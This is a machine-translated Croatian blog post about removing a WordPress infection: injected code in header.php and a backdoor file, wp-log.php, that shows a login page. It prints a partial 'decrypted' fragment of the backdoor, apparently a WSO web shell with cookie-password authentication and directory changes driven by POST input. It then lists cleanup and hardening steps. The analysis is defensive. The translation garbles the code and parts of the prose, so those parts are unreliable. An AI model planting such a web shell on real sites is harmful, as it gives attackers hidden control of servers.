WordPress Virus - PHP Hack - Uklanjanje WordPress virusa

Prije nekoliko dana sam primjetio uređaj sumnjivo broj (virus / malware) u izvoru tekućeg bloga WordPress. Sljedeće PHP kod bio prisutan u header.php, prije reda .

[Php][/ Php]

Ne znam kako se točno naziva ovaj virus i nimci macradi točno ono što čini, ali je nevidljiv posjetiteljima pogođenih web mjesta. Umjesto toga, uzrokuje veliko rangiranje u tražilicama (posebno na Googleu) i time značajno smanjuje broj posjetitelja pogođenih web stranica.

Detalji poznato o tom virusu datoteka:

1. Gore kod prisutan u header.php

2. Pojava u datoteku wp-log.php mapa wp-uključuje.

wp-log

3. Pratite log.php wp-uključuje kôd, šifrirane:

[Php][/ Php]

Dešifriranje koda u wp-log.php:

[Php]

");
}

funkcija WSOsetcookie ($ k, $ v) {
$ _KOLAČIĆ [$ k] = $ v;
setcookie ($ k, $ v);
}

if (! prazno ($ auth_pass)) {
if (isset ($ _ POST ['pass']) && (md5 ($ _ POST ['pass']) == $ auth_pass))
WSOsetcookie (md5 ($ _ SERVER ['HTTP_HOST']), $ auth_pass);

if (! isset ($ _ COOKIE [md5 ($ _ SERVER ['HTTP_HOST'])]) || ($ _COOKIE [md5 ($ _ SERVER ['HTTP_HOST'])]! = $ auth_pass))
wsoLogin ();
}

if (strtolower (substr (PHP_OS, 0,3)) == "win")
$ os = 'pobijediti';
drugo
$ os = 'nix';

$ safe_mode = @ini_get ('safe_mode');
ako (! $ safe_mode)
error_prijava (0);

$ disable_functions = @ini_get ('disable_functions');
$ home_cwd = @getcwd ();
if (isset ($ _ POST ['c']))
@chdir ($ _ POST ['c']);
$ cwd = @getcwd ();
if ($ os == 'win') {
$ home_cwd = str_replace (“\\”, “/”, $ home_cwd);
$ cwd = str_replace (“\\”, “/”, $ cwd);
}
ako ($ cwd [strlen ($ cwd) -1]! = '/')
$ cwd. = '/';
?>
[/ Php]

4. Ako se stranici pristupi izravno numeblog.com/wp-includes/wp-log.php pojavljuje se stranica s poljem ovjera. Na prvi pogled čini se da je file menadžer.

WORDPRESS DEVIRUSING.

1. Prvo izbrišite kod iz header.php i datoteka wp-log.php od wp-uključuje.

2. Provjerite datoteku .htaccess sumnjivih direktiva. Izvršenje redaka dozvola ili skripte.

3. Provjerite mapu s temama (/ wp-content /teme/ Nume_tema). Potražite nove i postojeće datoteke (posebno .php datoteke) koje su pretrpjele sumnjive promjene.

4. Provjerite mapu uključitiS (wp-content/plugins).

5. Provjerite wp-sadržaja sumnjivih datoteka.

6. Provjerite dozvole za pisanje mapa i datoteka. chmod si chown.

WORDPRESS DEVIRUSING PRIJEDLOZI.

1. U prvom je dobro napraviti sigurnosnu kopiju svih datoteka bloga i baze podataka.

2. Izbrišite mape wp-admin si wp-uključuje i sve datoteke . PHP iz korijena stranice. Ako imate prilagođene .php datoteke, bilo bi dobro provjeriti ih ručno.

3. Preuzmite trenutnu verziju WordPressa i prenesite.

4. Provjerite u bazi podataka ako korisnik s rangom administratora nije stvoren.

To je otprilike sve što imamo za reći o ovom virusu, ali ako imate dodatke ili otkrijemo nove detalje, rado ćemo ažurirati ovaj članak.

POTAJNO SETTINGS - UKLONITE WORDPRESS VIRUS .

WordPress Virus - PHP Hack - Uklanjanje WordPress virusa

O autoru

Stealth LP

Osnivač i urednik potajno SettingsU 2006 dana.
Iskustvo s Linux operativnim sustavima (posebno CentOS), Mac OS X, Windows XP> Windows 10 i WordPress (CMS).

Ostavite komentar

Prevedite na svoj jezik

RomanianEnglishGermanDanishFrenchSpanishItalianPortugueseDutchNorwegianSwedishSlovakEstonianCroatianCzechSlovenianBulgarianGreekLatvianLithuanianFinnishChinese (Simplified)Chinese (Traditional)HindiHebrewHungarianIndonesianJapaneseKoreanArabicPolishRussianThaiTurkishUkrainianVietnamese

© 2006 - 2020 potajno Settings - IT udžbenici i vijesti. Operativni sustavi: Windows, macOS, Linux, iOS. Mrežna sigurnosna rješenja, antivirus i vatrozid.